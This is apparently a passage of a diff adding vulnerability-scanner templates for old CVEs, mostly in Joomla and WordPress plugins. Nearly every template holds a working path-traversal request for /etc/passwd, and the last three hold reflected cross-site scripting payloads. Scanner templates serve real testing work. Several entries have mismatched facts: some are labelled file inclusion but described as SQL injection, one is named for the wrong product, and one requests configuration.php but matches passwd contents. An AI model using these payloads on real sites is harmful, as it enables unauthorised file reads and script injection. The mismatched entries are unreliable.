- https://www.cvedetails.com/cve/CVE-2010-1658
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1715
|
||||
|
||||
info:
|
||||
name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. NOTE some of these details are obtained from third party information.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12174
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1715
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1858
|
||||
|
||||
info:
|
||||
name: Joomla! Component SMEStorage - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the SMEStorage (com_smestorage) component before 1.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11853
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1858
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1873
|
||||
|
||||
info:
|
||||
name: Joomla! Component Jvehicles - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11997
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1873
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1878
|
||||
|
||||
info:
|
||||
name: Joomla! Component OrgChart 1.0.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the OrgChart (com_orgchart) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12317
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1878
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1977
|
||||
|
||||
info:
|
||||
name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12083
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1977
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2010-1982
|
||||
info:
|
||||
name: Joomla! Component JA Voice 2.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12121
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1982
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2045
|
||||
|
||||
info:
|
||||
name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12595
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2045
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2050
|
||||
|
||||
info:
|
||||
name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12611
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2050
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2128
|
||||
|
||||
info:
|
||||
name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12607
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2128
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2507
|
||||
|
||||
info:
|
||||
name: Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Picasa2Gallery (com_picasa2gallery) component 1.2.8 and earlier for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/13981
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2507
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2680
|
||||
|
||||
info:
|
||||
name: Joomla! Component jesectionfinder - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/14064
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2680
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2857
|
||||
|
||||
info:
|
||||
name: Joomla! Component Music Manager - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the cid parameter to album.html.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/14274
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2857
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-2918
|
||||
|
||||
info:
|
||||
name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/31708
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2918
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-3203
|
||||
|
||||
info:
|
||||
name: Joomla! Component PicSell 1.0 - Local File Disclosure
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/14845
|
||||
- https://www.cvedetails.com/cve/CVE-2010-3203
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-4282
|
||||
|
||||
info:
|
||||
name: phpShowtime 2.0 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/15643
|
||||
- https://www.cvedetails.com/cve/CVE-2010-4282
|
||||
tags: cve,cve2010,lfi,joomla
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-4719
|
||||
|
||||
info:
|
||||
name: Joomla! Component JRadio - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/15749
|
||||
- https://www.cvedetails.com/cve/CVE-2010-4719
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-4769
|
||||
|
||||
info:
|
||||
name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the task parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/15585
|
||||
- https://www.cvedetails.com/cve/CVE-2010-4769
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-4977
|
||||
|
||||
info:
|
||||
name: Joomla! Component Canteen 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/34250
|
||||
- https://www.cvedetails.com/cve/CVE-2010-4977
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-5028
|
||||
|
||||
info:
|
||||
name: Joomla! Component JE Job 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/12601
|
||||
- https://www.cvedetails.com/cve/CVE-2010-5028
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-5286
|
||||
|
||||
info:
|
||||
name: Joomla! Component Jstore - 'Controller' Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/34837
|
||||
- https://www.cvedetails.com/cve/CVE-2010-5286
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2011-2744
|
||||
|
||||
info:
|
||||
name: Chyrp 2.x - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/35945
|
||||
- https://www.cvedetails.com/cve/CVE-2011-2744
|
||||
tags: cve,cve2011,lfi,chyrp
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2012-0896
|
||||
|
||||
info:
|
||||
name: Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/108631/
|
||||
- https://www.cvedetails.com/cve/CVE-2012-0896
|
||||
tags: cve,cve2012,lfi,wordpress,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2012-0981
|
||||
|
||||
info:
|
||||
name: phpShowtime 2.0 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/18435
|
||||
- https://www.cvedetails.com/cve/CVE-2012-0981
|
||||
tags: cve,cve2012,lfi,phpshowtime
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2012-0996
|
||||
|
||||
info:
|
||||
name: 11in1 CMS 1.2.1 - Local File Inclusion (LFI)
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/36784
|
||||
- https://www.cvedetails.com/cve/CVE-2012-0996
|
||||
tags: cve,cve2012,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2012-1226
|
||||
|
||||
info:
|
||||
name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/36873
|
||||
- https://www.cvedetails.com/cve/CVE-2012-1226
|
||||
tags: cve,cve2012,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -9,6 +9,11 @@ info:
|
|||
- https://www.exploit-db.com/exploits/38936
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
|
||||
tags: cve,cve2013,wordpress,wp-plugin,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2013-7240
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2014-10037
|
||||
|
||||
info:
|
||||
name: DomPHP 0.83 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/30865
|
||||
- https://www.cvedetails.com/cve/CVE-2014-10037
|
||||
tags: cve,cve2014,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2014-4539
|
||||
|
||||
info:
|
||||
name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/d6ea4fe6-c486-415d-8f6d-57ea2f149304
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4539
|
||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2014-4539
|
||||
cwe-id: CWE-79
|
||||
description: "Cross-site scripting (XSS) vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php."
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "'><script>alert(document.cookie)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2014-4544
|
||||
|
||||
info:
|
||||
name: Podcast Channels < 0.28 - Unauthenticated Reflected XSS
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4544
|
||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2014-4544
|
||||
cwe-id: CWE-79
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2014-4550
|
||||
|
||||
info:
|
||||
name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: |
|
||||
- https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4550
|
||||
tags: cve,cve2014,wordpress,wp-plugin,xss
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2014-4550
|
||||
cwe-id: CWE-79
|
||||
description: "Cross-site scripting (XSS) vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter."
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
